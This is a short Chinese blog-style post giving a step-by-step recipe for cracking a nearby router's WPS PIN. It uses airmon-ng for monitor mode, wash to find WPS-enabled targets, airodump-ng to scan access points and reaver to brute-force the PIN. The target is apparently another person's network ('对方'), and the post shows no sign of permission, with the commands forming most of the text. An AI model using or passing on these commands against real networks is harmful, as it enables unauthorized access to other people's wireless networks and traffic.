晚上闲来无事,翻腾背包看到好久不用的黑宝石了,拿出来用用吧。一直没搞过开了WPS的无线路由,貌似网上说TP-Link的无线路由器默认是打开WPS的,尝试一下,嘿嘿。

打开shell窗口
1 输入:airmon-ng start wlan0 开启监听模式。

2 输入:wash -i mon0 -C 查看所有开启WPS的无线路由长时间无反应按Ctrl+C,结束进程,这时记下你要PJ的目标路由MAC.

3 输入:airodump-ng mon0 网卡以混杂模式扫描所有频道—并显示所有AP的信息(包括 AP的信号强度,ESSID,MAC,频道,加密方式,等等…..)

注:如果你已知对方无线路由信息第2,第3步可省略!

4 输入:reaver -i mon0 -b MAC -a -S -vv  -d 3 -t 3开始穷举pin码。

速度好慢啊,睡觉去,估计睡醒了就能看到PIN码了。